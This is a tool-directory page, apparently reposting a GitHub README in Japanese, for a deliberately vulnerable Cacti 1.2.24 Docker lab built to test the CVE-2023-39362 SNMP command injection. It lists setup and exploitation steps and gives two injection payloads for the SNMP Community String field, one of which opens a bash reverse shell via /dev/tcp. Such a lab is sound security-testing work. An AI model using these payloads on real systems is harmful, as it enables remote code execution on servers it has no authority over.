Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cacti-rce-snmp-options-vulnerable-application — 警告: これはCactiのコマンドインジェクション(CVE-2023-39362)のエクスプロイトをテストするための脆弱なアプリケーションです。自己責任で実行してください! | Kitploit
ツール/GitHubGitHub/m3ssap0/cacti-rce-snmp-options-vulnerable-application
脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロール学習と教育ラボと実践
GitHubm3ssap0/cacti-rce-snmp-options-vulnerable-application

cacti-rce-snmp-options-vulnerable-application

警告: これはCactiのコマンドインジェクション(CVE-2023-39362)のエクスプロイトをテストするための脆弱なアプリケーションです。自己責任で実行してください!

リポジトリを見るウェブサイト
21年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Cacti v1.2.24 認証済みコマンドインジェクション (CVE-2023-39362) 脆弱性アプリケーション

これは Cacti の脆弱性 (CVE-2023-39362) に対するエクスプロイトをテストするための脆弱性アプリケーションです。

警告!

このアプリケーションには深刻なセキュリティ脆弱性が含まれています。自己責任で実行してください!バックアップがあり隔離された環境(最近のスナップショットとホストオンリーネットワークを備えたVMなど)の使用を推奨します。このアプリケーションをインターネットに接続されたサーバーにアップロードしないでください。侵害されます。

免責事項: 私は、誰もがこのアプリケーションを使用する方法について責任を負いません。このアプリケーションの唯一の目的は、CVE-2023-39362 エクスプロイトのテストシナリオとなることであり、悪意を持って使用されるべきではありません。このアプリケーションのインストールによってサーバーが侵害された場合、それは私の責任ではなく、アップロードしてインストールした人物の責任です。

脆弱性情報

  • CVE-ID: CVE-2023-39362
  • リンク: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362
  • 説明: Cacti 1.2.24 において、特定の条件下で、認証された特権ユーザーがデバイスの SNMP オプションに悪意のある文字列を使用し、コマンドインジェクションを実行して、基盤となるサーバー上でリモートコード実行を達成する可能性があります。

使用方法

環境をセットアップする手順は次のとおりです:

  1. docker compose up -d を実行して構成を開始します。
  2. http://127.0.0.1/cacti にアクセスして Cacti 初期化ウィザードを開始すると、手順を完了できます。データベースに関するエラーが発生した場合は、少し待ってからページを更新してください。
  3. デフォルトの認証情報は admin/ です。
admin
  • ウィザード中はすべてのボタンで「Next」を押し、適宜オプションを選択します。デフォルトのままで問題なく、必須の前提条件はすべて満たされているはずです。
  • インストール後、admin としてログインします。
  • 「Console」→「Configuration」→「User」の順に移動します。
  • guest ユーザーをクリックします。
  • 「Enable」で有効にし、パスワードを設定します。必要に応じて「Must Change Password at Next Login」を無効にします。
  • 「Save」ボタンをクリックします。
  • 「Permissions」セクションに移動します。
  • 「General Administration」の下で、「Console Access」と「Sites/Devices/Data」を有効にします。
  • 「Save」ボタンをクリックします。
  • ログアウトして guest として再ログインし、エクスプロイトを試します。
  • コンテナ名は vuln-cacti になります。

    テスト用 SNMP デバイスのホスト名は monitored_snmp_device です。

    環境を破棄するには、docker compose down コマンドを使用します。

    Cacti の公式インストールガイドは こちら にあります。

    根本原因

    この脆弱性の詳細な根本原因は、オリジナルのセキュリティアドバイザリ または 私のブログ記事 で確認できます。

    エクスプロイト

    (これは 考えられる一つの エクスプロイトです)

    1. 「Console」→「Create」→「New Device」に移動します。
    2. SNMP バージョン 1 または 2 をサポートするデバイスを作成します。
    3. デバイスに次のテンプレートのいずれかを含むグラフがあることを確認します:
      • 「Net-SNMP - Combined SCSI Disk Bytes」
      • 「Net-SNMP - Combined SCSI Disk I/O」
      • (テンプレート「Net-SNMP Device」からデバイスを作成すると、グラフの前提条件を満たします)
    4. 「SNMP Options」の「SNMP Community String」フィールドに次のような値を使用します: public\' ; touch /tmp/m3ssap0 ; \' 。
    5. 「Create」ボタンをクリックします。
    6. /tmp 以下に作成されたファイルが存在することを確認します。

    リバースシェルを取得するには、次のようなペイロードを使用できます。

    root@kitploit:~
    public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
    

    著作者

    • Antonio Francesco Sardella - 脆弱性報告者 - m3ssap0

    ライセンス

    このプロジェクトは Unlicense の下でライセンスされています。詳細は LICENSE ファイルを参照してください。

    ツールをダウンロード